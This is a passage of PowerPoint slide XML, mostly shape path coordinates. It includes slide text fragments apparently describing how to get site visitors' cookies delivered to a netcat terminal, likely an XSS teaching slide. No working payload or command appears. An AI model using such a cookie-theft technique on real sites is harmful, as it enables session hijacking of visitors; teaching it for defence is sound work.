                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232155" y="199389"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="298576" y="109220"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="292734" y="109220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287400" y="110489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281940" y="113029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276986" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267970" y="121920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264286" y="127000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261366" y="133350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258952" y="138429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257555" y="144779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257428" y="148589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257175" y="153670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257809" y="157479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260350" y="166370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262127" y="170179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264541" y="172720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266826" y="176529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269494" y="180339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272287" y="182879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274954" y="186689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277749" y="189229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282955" y="195579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285242" y="198120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287147" y="201929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288925" y="204470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290195" y="207010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290829" y="209550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291465" y="213360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291083" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288544" y="220979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287020" y="223520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283209" y="227329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281050" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278637" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276098" y="229870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318389" y="229870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319024" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321436" y="223520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322706" y="218439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322960" y="213360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323087" y="208279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322452" y="204470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321182" y="200660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319785" y="195579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318007" y="191770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315595" y="189229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310515" y="181610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307721" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304926" y="175260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302259" y="171450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299466" y="168910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296799" y="166370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294512" y="163829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292607" y="160020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290575" y="157479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289432" y="154939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288798" y="151129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288162" y="148589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288544" y="146050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289814" y="143510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290702" y="140970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291973" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295021" y="135889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296799" y="135889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298830" y="134620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347218" y="134620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343916" y="130810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342010" y="128270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337311" y="124460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334645" y="123189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="331850" y="120650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328929" y="119379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325881" y="116839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="316737" y="113029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298576" y="109220"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="135381" y="154939"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="131064" y="154939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130301" y="156210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129667" y="157479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128904" y="157479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127380" y="160020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126492" y="162560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125475" y="163829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124078" y="167639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123190" y="170179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122427" y="173989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122427" y="175260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123444" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124332" y="179070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125856" y="181610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127253" y="182879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129285" y="185420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131825" y="187960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152907" y="201929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159639" y="205739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166370" y="208279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173100" y="208279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179704" y="209550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186054" y="209550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192024" y="208279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220196" y="184150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175132" y="184150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169291" y="182879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166116" y="182879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162941" y="181610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157987" y="179070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153924" y="176529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150622" y="173989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147447" y="170179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144779" y="167639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140589" y="162560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138937" y="160020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137668" y="158750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136525" y="156210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135381" y="154939"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="200151" y="64770"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="194436" y="64770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183642" y="67310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159130" y="99060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159003" y="109220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159384" y="113029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171069" y="134620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176656" y="142239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181991" y="147320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184657" y="151129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186944" y="153670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188722" y="156210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190626" y="158750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192531" y="165100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193167" y="167639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192785" y="171450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191389" y="173989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190246" y="176529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188722" y="179070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184911" y="181610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182625" y="182879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177800" y="184150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220196" y="184150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220725" y="182879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223139" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224408" y="172720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224626" y="165100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224535" y="162560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224154" y="158750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222757" y="154939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221487" y="151129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219582" y="147320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214756" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212090" y="137160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209423" y="133350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201168" y="124460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198374" y="120650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196087" y="118110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192277" y="111760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191007" y="109220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189737" y="104139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190119" y="100329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191516" y="97789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192404" y="95250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193548" y="93979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196596" y="91439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198374" y="90170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202437" y="88900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248094" y="88900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245618" y="85089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243585" y="83820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239014" y="80010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236347" y="77470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230504" y="73660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227583" y="72389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224408" y="71120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212344" y="66039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200151" y="64770"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="103754" y="102870"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="75183" y="102870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77977" y="158750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78104" y="162560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78358" y="163829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78612" y="163829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79248" y="165100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81025" y="166370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82296" y="167639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85851" y="170179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88392" y="170179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91567" y="172720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98298" y="175260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100583" y="176529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106806" y="176529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107442" y="175260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107823" y="173989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107950" y="172720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107866" y="165100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103754" y="102870"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="347218" y="134620"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="308101" y="134620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310769" y="135889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313690" y="137160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317373" y="138429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320548" y="140970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323342" y="142239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326008" y="144779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328295" y="147320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330073" y="149860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="331977" y="152400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333501" y="153670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334645" y="154939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335915" y="157479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="336803" y="158750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340232" y="158750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340868" y="157479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342137" y="156210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342900" y="154939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343534" y="153670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345058" y="151129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345948" y="149860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346836" y="147320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347472" y="146050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347979" y="144779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348742" y="142239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349123" y="140970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348996" y="138429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348233" y="135889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347218" y="134620"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="64770" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="60959" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60325" y="1270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59817" y="5079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59817" y="10160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64389" y="77470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4191" y="121920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2540" y="123189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1524" y="124460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380" y="125729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="127000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="761" y="129539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1777" y="130810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3682" y="132079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5460" y="132079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8127" y="134620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11683" y="135889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14731" y="137160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17145" y="138429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19176" y="138429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21081" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28067" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28955" y="138429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75183" y="102870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103754" y="102870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103250" y="95250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136905" y="69850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92709" y="69850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89661" y="16510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89534" y="15239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89026" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88519" y="11429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86614" y="10160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85217" y="8889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83439" y="8889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81660" y="7620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79121" y="6350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75946" y="5079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72135" y="2539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69087" y="1270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66928" y="1270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64770" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="241934" y="113029"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="239268" y="113029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239902" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241300" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241934" y="113029"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="248094" y="88900"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="207264" y="88900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209676" y="90170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212344" y="90170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215265" y="91439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219075" y="93979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222250" y="95250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227583" y="100329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229870" y="102870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231775" y="104139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233552" y="106679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235076" y="109220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236347" y="110489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237490" y="111760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238505" y="113029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242570" y="113029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243840" y="111760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245236" y="109220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245872" y="107950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246760" y="106679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247650" y="104139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249047" y="100329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249554" y="100329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250062" y="99060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250825" y="95250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250825" y="93979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250571" y="92710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249808" y="91439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248920" y="90170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248094" y="88900"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="142494" y="35560"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="136525" y="35560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135127" y="36829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92709" y="69850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136905" y="69850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157099" y="54610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159257" y="53339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160908" y="50800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163068" y="49529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163322" y="48260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144399" y="36829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142494" y="35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39552DD7-29A1-5CB3-6F81-7261981F3830}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2157983" y="1432686"/>
            <a:ext cx="3850004" cy="22860"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3850004" h="22859">
                <a:moveTo>
                  <a:pt x="3849624" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="22860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3849624" y="22860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3849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869E9A35-6192-A21D-A0DC-B26419AC8A5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5870828" y="6047943"/>
            <a:ext cx="5015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5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t> get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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>visitors </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>cookies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netcat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terminal!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A28456F5-FE29-C8E1-A018-DF778D108862}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3035045" y="4528565"/>
            <a:ext cx="7862570" cy="247015"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7862570" h="247014">
                <a:moveTo>
                  <a:pt x="7862315" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7860690" y="48059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7856267" y="87296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7849725" y="113746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7841742" y="123443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3951731" y="123443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3943748" y="133141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3937206" y="159591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3932783" y="198828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3931157" y="246887"/>
                </a:lnTo>
                <a:lnTo>
